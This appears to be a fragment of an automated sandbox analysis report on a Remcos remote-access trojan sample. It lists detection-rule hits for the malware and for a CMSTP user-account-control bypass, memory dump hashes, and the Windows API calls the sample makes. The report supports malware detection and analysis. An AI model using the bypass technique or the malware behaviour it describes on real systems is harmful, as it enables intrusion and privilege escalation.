                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Reputation:low
                                                                                        Has exited:false


                                                                                          Execution Graph

                                                                                          Execution Coverage:12.4%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:13.2%
                                                                                          Total number of Nodes:91
                                                                                          Total number of Limit Nodes:9

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                          • API String ID: 0-1079488684
                                                                                          • Opcode ID: 902c19787d6a949a36473e1e0d33b70e7b7550f3859a3c9ecb75e8e5f2e6cfe1
                                                                                          • Instruction ID: 445acbac42fa19948111d2757c06ba1c442eb2e6abe8c12bed0365f09125f420
                                                                                          • Opcode Fuzzy Hash: 902c19787d6a949a36473e1e0d33b70e7b7550f3859a3c9ecb75e8e5f2e6cfe1
                                                                                          • Instruction Fuzzy Hash: 1E427E70A002188FEB54DF68C85479EBBF6BF84300F1485AAD40AEB395DB74AD85CF95

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d
                                                                                          • API String ID: 0-2564639436
                                                                                          • Opcode ID: 76e1264ea13c8210a809d0c7d84fb7cdd60b6b71f10cab87e04f58b1ac9a1d1d
                                                                                          • Instruction ID: 4bdff14910557cb9f4e89aaae120dd2473336a3c727641096a64d15d6afe502c
                                                                                          • Opcode Fuzzy Hash: 76e1264ea13c8210a809d0c7d84fb7cdd60b6b71f10cab87e04f58b1ac9a1d1d
                                                                                          • Instruction Fuzzy Hash: EE72D074E01228CFDB65EF65C948AEDBBB2EF48300F5184E9D449B6264DB359EA1CF40

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d
                                                                                          • API String ID: 0-2564639436
                                                                                          • Opcode ID: b9f71cb6c13d3fd73bc688ed8c9c4588e6f977a570a235d9f337a2fa93cdc0d1
                                                                                          • Instruction ID: 226da41d958f174c607ab39fb1e3129eb1c38c2d984746c84da7a514f9c57f75
                                                                                          • Opcode Fuzzy Hash: b9f71cb6c13d3fd73bc688ed8c9c4588e6f977a570a235d9f337a2fa93cdc0d1
                                                                                          • Instruction Fuzzy Hash: D042BC74E01228DFDB65EF64C988AEDBBB2EF49304F5080E9D449A7264DB359E91CF40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b051b9443ac2693362ec59a310bb63eed2111b30ee76ce54c847c641fae98c1f
                                                                                          • Instruction ID: 24c99a4c601d6e4778e95476b4ee2b6e98746acad002207f9d2d2664ae36e2d2
                                                                                          • Instruction Fuzzy Hash: 4A427178E11219CFDB54CFA9C984B9DBBB6BF48310F1481A9E809A7355DB34AE81CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fbfe98f1398d7f1f66bf8b304190ee2dba741cde46a6cd0fd13481965594b145
                                                                                          • Instruction ID: 5df71da715cd3dfdf3f44a1a1ce4be7956290e3ad26cb7edbffa854b928a7dd9
                                                                                          • Instruction Fuzzy Hash: 7432A170A01219CFEB50DFAAC584A8EFBB6BF48311F55D195E448AB212DB30ED85CF64
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b0c6c95de51eea282d82a874361061bfdffb8b2f2acc5bbd32f9618aa831dcd7
                                                                                          • Instruction ID: 094d1f44b77e98d5202e62e45c70cf298020959a4a2e54719b9a440a223ff18e
                                                                                          • Instruction Fuzzy Hash: 7FC16A30E002188FEB15CFA5C8947DEBBB6BF88304F14C5AAD809AF355DB74A985CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf625f16b92722d1eb2fd38a3e5c2304d5af3b4cb2af5a8e07996e3b5b8680f8
                                                                                          • Instruction ID: 2fcb03f6d664ac74a7035cff40c1175b7f28134d29463103338ae71918b71a10
                                                                                          • Instruction Fuzzy Hash: D261B575E01218DBEB18CFAAD985BDDBBB6BF88300F1481A9E809A7354DB359941CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 129298c45405b8e8d971cc64f6b95142ccfac92aa09b5563f3b4dbe858ed52c0
                                                                                          • Instruction ID: 16d15e375b0838f449eeb7cda74de7393235365bff71f027981b065dc14e5faa
                                                                                          • Instruction Fuzzy Hash: 04518475D012199FDB08DFEAC9456EEFBF6BF88300F10802AE819AB254DB745946CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6f1aa423ce6a867e5ad94f8f3e183baf2995550cadea261f479bc1e59e171ca
                                                                                          • Instruction ID: f1c0ad4c5af22d85f2805a7f320c280639eff2cac3501d61eb7260a31c10ee55
                                                                                          • Instruction Fuzzy Hash: 314177311053018BDB419F38C850296FBE2FF46318B1886BAC849CB3A6EB74E849C780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdc8b2256a8b88b1cafc545e649b041f1475944e62bf4cf70ecdb2bf6290752a
                                                                                          • Instruction ID: 09567797932ff47c5f333311ed04d2f74326ce218e97cb826e144f4c0c159b74
                                                                                          • Instruction Fuzzy Hash: 8741E6B1E006188FEB58CFAAC9517DEBBF6BFC8300F14C0A9D41DA6255EB341A858F51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdfd199a65a7cbb44b538c505684e6707435c0424b6c5b224ead5adcc84c1c94
                                                                                          • Instruction ID: f124b681ccc3e08e4c48af0fbf8c1273b8a611df4694eb86568dd75564f75ed0
                                                                                          • Instruction Fuzzy Hash: 434194B5E006199FDB08CFAAD9456EEBBF6AF88310F14C02AE419AB254DB345946CF40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0bb8c53f62dea70b5f8e611726427bcb2d2181fffce009e0fd3599bdf977a151
                                                                                          • Instruction ID: ce86ca6f5642047256c8e88f49c87f8ed843e60b92ffb14a5c0f19aa31d47e50
                                                                                          • Instruction Fuzzy Hash: F541F9B1E006188FEB18CF6AC9507DEBBF2BF88300F14C0AAD51DA7255EB305A858F51

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: bcac6758c5ae0ab65bb0bfe771f351c58a31d7c3152dbd88ce276a92bce55495
                                                                                          • Instruction ID: 0ed0ee2819abc5b5c8aa5e9810bf5a9d9ea410d6d8fff5f7e7deddda5489b913
                                                                                          • Instruction Fuzzy Hash: DC814870A00B059FD724DF29D04976ABBF2FF89308F00892DD48AE7A50DB75E946CB94

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromIconResource
                                                                                          • String ID:
                                                                                          • API String ID: 3668623891-0
                                                                                          • Opcode ID: a9923d159f6bc4d811ad60890998bbecd6524a838a8006d281d0f7d09f89559f
                                                                                          • Instruction ID: 40fec4cf00f54a363f4c7af9b2bc3a7441982d42a7dfd990a6b8500e6acb93c8
                                                                                          • Instruction Fuzzy Hash: 8731A9729043889FDB01CFA9C804AEEBFF8EF09310F14805AE954EB221C335A951CFA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0276E476,?,?,?,?,?), ref: 0276E537
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 0f6961ce40f0722614bc664776615e7777377503b0b0b584ee504db26257217c
                                                                                          • Instruction ID: eacfbf68cacbea56a62bf3589b404ab7879901f3cff4d4049b66cb2932632a24
                                                                                          • Instruction Fuzzy Hash: 542103B5900218DFDB10CFAAD984AEEBFF4EB48314F14841AE914A7310D378A940CFA4

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,058B1C92,?,?,?,?,?), ref: 058B1D37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromIconResource
                                                                                          • String ID:
                                                                                          • API String ID: 3668623891-0
                                                                                          • Opcode ID: 5adb3ebb52923454534abed37bfad17e2b5143e3e218c6811dabdae611454471
                                                                                          • Instruction ID: 6f2f4616f8dcb44cef759f9c4497a22b1979095142febfb502a04fc595f3b526
                                                                                          • Instruction Fuzzy Hash: D7113AB5800259DFEB10CF9AD844BEEBFF8EB48310F14841AE954A7350C375A954CFA4
                                                                                          APIs
                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0276A72D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallbackDispatcherUser
                                                                                          • String ID:
                                                                                          • API String ID: 2492992576-0
                                                                                          • Opcode ID: 12e24eea4bef952a56c3158d0881445477e00e4cd27e7a140ad62cfe9f672432
                                                                                          • Instruction ID: f58c0d62e490f303d9ce1411174e4d10beb841bb9dc5bfa7e6b7719c74b43eb7
                                                                                          • Instruction Fuzzy Hash: 7811A9B5804389DEDB11DF95D5083EEBFF4EB09314F1480A9D888B7242C3799A85CBA5
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0276BBE4), ref: 0276BE1E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: 5e7bdcdcb281f90d35dd45cf57b508479ec2df4cc62203c65a63dfbcac003088
                                                                                          • Instruction ID: 2bfd833d9d89784cab8296c598b8964fd098e3fbbe4a38fb0ef0aa0509753f1b
                                                                                          • Instruction Fuzzy Hash: C71132B5C002498FDB10CF9AC448AEEFBF4EF49318F10842AD918B7210C375A545CFA4
                                                                                          APIs
                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0276A72D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallbackDispatcherUser
                                                                                          • String ID:
                                                                                          • API String ID: 2492992576-0
                                                                                          • Opcode ID: d41944bccd0bc4b97c55e42b7d6c95a87d0d3cb7860aadac8254bb5e0d9266b6
                                                                                          • Instruction ID: 546dcf769966974ce47857917353debd2982980304f447f0fc5f42f124d4de4b
                                                                                          • Instruction Fuzzy Hash: CF11B2B5804389DEDB10DF55D5043EEBFF4EB05314F144099D488B7242C3799A44CBA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713719831.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b6d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2dceb3bb8b948eb520fc096017414dd169bdf3a3ffe32d1833e9ea5e785df377
                                                                                          • Instruction ID: 6e968b44159303f84beee486842480a612fc0a02ddc019aa4306b36e4a9d235e
                                                                                          • Opcode Fuzzy Hash: 2dceb3bb8b948eb520fc096017414dd169bdf3a3ffe32d1833e9ea5e785df377
                                                                                          • Instruction Fuzzy Hash: 0C213A71A04200DFDB15DF14D9C0B27BFA5FBA4318F20C1A9D90A4B656C33AD855CBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713995482.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_f0d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eb77d9e8bf799c889e3a56172d31bb781724fa07c8a1d299aafc6334e9343bf1
                                                                                          • Instruction ID: 7eb8f9a5fc6ec17b7ee9e4db3792ed2e6429f3c98be67d6494cf99e70cce43bb
                                                                                          • Opcode Fuzzy Hash: eb77d9e8bf799c889e3a56172d31bb781724fa07c8a1d299aafc6334e9343bf1
                                                                                          • Instruction Fuzzy Hash: 4F212671904304EFDB05DF94D9C0B26FBA5FB84324F20C66DE8094B2D6C336D846EA61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713995482.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_f0d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9d12ec2949d54f962e654e35b61107ec3537549063633cbab83fc12e9a0b0ea8
                                                                                          • Instruction ID: f1e31ac3beaea8961488b4b34d9d73ec3687140c7bdd41c3715c590cc93b1642
                                                                                          • Opcode Fuzzy Hash: 9d12ec2949d54f962e654e35b61107ec3537549063633cbab83fc12e9a0b0ea8
                                                                                          • Instruction Fuzzy Hash: 5F21F271604200DFDB14DF54D984B26BBA5EB84324F20C569D84E4B29AC33AD847EA62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713995482.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_f0d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eedf4541bfeeab1372c496e3e4d895a4b2e2b8cdc7333e3b22dafe5878324915
                                                                                          • Instruction ID: 6377789f0b8a7a8539b315b6ed8041a93d305d96d2a23cfc59ebb893dba4b59b
                                                                                          • Opcode Fuzzy Hash: eedf4541bfeeab1372c496e3e4d895a4b2e2b8cdc7333e3b22dafe5878324915
                                                                                          • Instruction Fuzzy Hash: D0218E755093808FCB02CF24D994715BF71EB46324F28C5EAD8498F6A7C33A980ADB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713719831.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b6d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                          • Instruction ID: 277c264d526c0671dba51612e21dc55808c089294585e98a15a74b07c1020ff9
                                                                                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                          • Instruction Fuzzy Hash: F5110372904240CFCB12CF04D5C4B16BFB1FBA4324F24C1A9D90A0B656C33AD85ACBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713995482.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_f0d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                          • Instruction ID: 2ada62e0e48008d1d4d8401518d589db13f2cfba2749ecea2603c64e5992a34a
                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                          • Instruction Fuzzy Hash: 9611BB75904280DFCB16CF54C9C4B15FBA1FB84324F24C6AAD8494B696C33AD80AEB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 672405b45a9f32ff667ca96329ba5affa0c58a3049ffc378fddfb1a59473f030
                                                                                          • Instruction ID: 0ef23fb85b92c6374dd2bac4bd879c08821e4ec0d03f6021b392f0e2ba3488b9
                                                                                          • Opcode Fuzzy Hash: 672405b45a9f32ff667ca96329ba5affa0c58a3049ffc378fddfb1a59473f030
                                                                                          • Instruction Fuzzy Hash: AEE10774E002198FDB14DFA9D5809AEFBF2BF89304F248169E814AB356DB74AD41CF61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdad1b3e14c05be23b000bbc99ce2abdef3b9edadc37de5c408b844f3c26e3b4
                                                                                          • Instruction ID: 02d26503970e51793ee519b729237052151911da7794fa5cda74cfed49cc8a68
                                                                                          • Opcode Fuzzy Hash: cdad1b3e14c05be23b000bbc99ce2abdef3b9edadc37de5c408b844f3c26e3b4
                                                                                          • Instruction Fuzzy Hash: 69717C74E012189FDB04DFAAC5849DEFBF2BF88300F14D166E819AB315DB74A942CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1203297b43df1783e0aae3b594115d290833597c0f193d940e330de49cdca38
                                                                                          • Instruction ID: d7f7397d4adc505a524fd95189f694142d42a4db20802eba9b598a4ed6b09abd
                                                                                          • Opcode Fuzzy Hash: f1203297b43df1783e0aae3b594115d290833597c0f193d940e330de49cdca38
                                                                                          • Instruction Fuzzy Hash: 68517375E006189FDB08DFAAC9446DEFBF2BF88310F14C06AE819AB354DB7459468F50

                                                                                          Execution Graph

                                                                                          Execution Coverage:4.1%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:5.1%
                                                                                          Total number of Nodes:1321
                                                                                          Total number of Limit Nodes:60
                                                                                          execution_graph 46584 415d41 46599 41b411 46584->46599 46586 415d4a 46610 4020f6 46586->46610 46590 415d65 46591 4170c4 46590->46591 46617 401fd8 46590->46617 46620 401e8d 46591->46620 46595 401fd8 11 API calls 46596 4170d9 46595->46596 46597 401fd8 11 API calls 46596->46597 46598 4170e5 46597->46598 46626 4020df 46599->46626 46604 41b456 InternetReadFile 46607 41b479 46604->46607 46606 41b4a6 InternetCloseHandle InternetCloseHandle 46608 41b4b8 46606->46608 46607->46604 46607->46606 46609 401fd8 11 API calls 46607->46609 46637 4020b7 46607->46637 46608->46586 46609->46607 46611 40210c 46610->46611 46612 4023ce 11 API calls 46611->46612 46613 402126 46612->46613 46614 402569 28 API calls 46613->46614 46615 402134 46614->46615 46616 404aa1 61 API calls ctype 46615->46616 46616->46590 46618 4023ce 11 API calls 46617->46618 46619 401fe1 46618->46619 46619->46591 46621 402163 46620->46621 46625 40219f 46621->46625 46704 402730 11 API calls 46621->46704 46623 402184 46705 402712 11 API calls std::_Deallocate 46623->46705 46625->46595 46627 4020e7 46626->46627 46643 4023ce 46627->46643 46629 4020f2 46630 43bda0 46629->46630 46635 4461b8 __Getctype 46630->46635 46631 4461f6 46659 44062d 20 API calls __dosmaperr 46631->46659 46632 4461e1 RtlAllocateHeap 46634 41b42f InternetOpenW InternetOpenUrlW 46632->46634 46632->46635 46634->46604 46635->46631 46635->46632 46658 443001 7 API calls 2 library calls 46635->46658 46638 4020bf 46637->46638 46639 4023ce 11 API calls 46638->46639 46640 4020ca 46639->46640 46660 40250a 46640->46660 46642 4020d9 46642->46607 46644 402428 46643->46644 46645 4023d8 46643->46645 46644->46629 46645->46644 46647 4027a7 46645->46647 46648 402e21 46647->46648 46651 4016b4 46648->46651 46650 402e30 46650->46644 46652 4016c6 46651->46652 46653 4016cb 46651->46653 46657 43bd68 11 API calls _abort 46652->46657 46653->46652 46654 4016f3 46653->46654 46654->46650 46656 
43bd67 46657->46656 46658->46635 46659->46634 46661 40251a 46660->46661 46662 402520 46661->46662 46663 402535 46661->46663 46667 402569 46662->46667 46677 4028e8 46663->46677 46666 402533 46666->46642 46688 402888 46667->46688 46669 40257d 46670 402592 46669->46670 46671 4025a7 46669->46671 46693 402a34 22 API calls 46670->46693 46673 4028e8 28 API calls 46671->46673 46676 4025a5 46673->46676 46674 40259b 46694 4029da 22 API calls 46674->46694 46676->46666 46678 4028f1 46677->46678 46679 402953 46678->46679 46680 4028fb 46678->46680 46702 4028a4 22 API calls 46679->46702 46683 402904 46680->46683 46684 402917 46680->46684 46696 402cae 46683->46696 46686 402915 46684->46686 46687 4023ce 11 API calls 46684->46687 46686->46666 46687->46686 46689 402890 46688->46689 46690 402898 46689->46690 46695 402ca3 22 API calls 46689->46695 46690->46669 46693->46674 46694->46676 46697 402cb8 __EH_prolog 46696->46697 46703 402e54 22 API calls 46697->46703 46699 402d24 46700 4023ce 11 API calls 46699->46700 46701 402d92 46700->46701 46701->46686 46703->46699 46704->46623 46705->46625 46706 426a77 46707 426a8c 46706->46707 46713 426b1e 46706->46713 46708 426bd5 46707->46708 46709 426ad9 46707->46709 46710 426b4e 46707->46710 46711 426bae 46707->46711 46707->46713 46716 426b83 46707->46716 46719 426b0e 46707->46719 46734 424f6e 49 API calls ctype 46707->46734 46708->46713 46739 4261e6 28 API calls 46708->46739 46709->46713 46709->46719 46735 41fbfd 52 API calls 46709->46735 46710->46713 46710->46716 46737 41fbfd 52 API calls 46710->46737 46711->46708 46711->46713 46722 425b72 46711->46722 46716->46711 46738 425781 21 API calls 46716->46738 46719->46710 46719->46713 46736 424f6e 49 API calls ctype 46719->46736 46723 425b91 